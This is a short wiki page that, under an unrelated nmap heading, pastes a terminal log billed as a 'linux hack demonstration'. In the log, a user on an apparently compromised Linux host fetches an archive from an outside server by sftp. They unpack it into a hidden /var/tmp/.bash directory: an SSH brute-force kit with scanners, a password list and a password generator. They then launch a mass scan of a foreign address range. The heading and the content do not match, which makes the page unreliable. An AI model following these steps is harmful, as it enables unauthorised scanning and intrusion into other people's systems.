hping wiki



from the nmap manual page:
TCP SYN scan: A linux hack demonstration :)))
login as: receptie Password: Linux recreatie 2.6.12-1-686 #1 Tue Sep 27 12:52:50 JST 2005 i686 GNU/Linux receptie@recreatie:~$ w
20:45:17 up 70 days,  6:18,  1 user,  load average: 0.00, 0.00, 0.00

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT receptie pts/1 ac970556.ipt.aol 20:44 0.00s 0.03s 0.00s w receptie@recreatie:~$ uname -a Linux recreatie 2.6.12-1-686 #1 Tue Sep 27 12:52:50 JST 2005 i686 GNU/Linux receptie@recreatie:~$ cd /var/tmp receptie@recreatie:/var/tmp$ ls filelist.txt.gz vi.recover receptie@recreatie:/var/tmp$ sftp weedzone@weedzone.netfirms.com Connecting to weedzone.netfirms.com... weedzone@weedzone.netfirms.com's password: sftp> cd www sftp> ls Fetching /mnt/b0263360/www/scanere/system.tgz to system.tgz /mnt/b0263360/www/scanere/system.tgz 3% 96KB 10.7KB/s 04:48 ETA sftp> bye receptie@recreatie:/var/tmp$ tar xvf system.tgz .bash/ .bash/gen-pass.sh .bash/vuln.txt .bash/paas .bash/pscan2 .bash/lolz .bash/a .bash/x .bash/pass_file .bash/core .bash/ss .bash/common .bash/ssh-scan .bash/218.1.pscan.22 receptie@recreatie:/var/tmp$ cd .bash receptie@recreatie:/var/tmp/.bash$ ls 218.1.pscan.22 common gen-pass.sh paas pscan2 ssh-scan x a core lolz pass_file ss vuln.txt receptie@recreatie:/var/tmp/.bash$ ./a 219 122 ### omega test driver designed By dork&dork.ltd ## ### Our Thanks TO : dork & dork & cornel ### ### let the games begin # scanning: 219.123.1. (total: 0) (0.4% done)


 
Edit this page Upload file Page history - Page last update: Thu Mar 02 20:13:23 GMT 2006 by 172.151.5.86 | Your address: 54.92.170.142 | Admin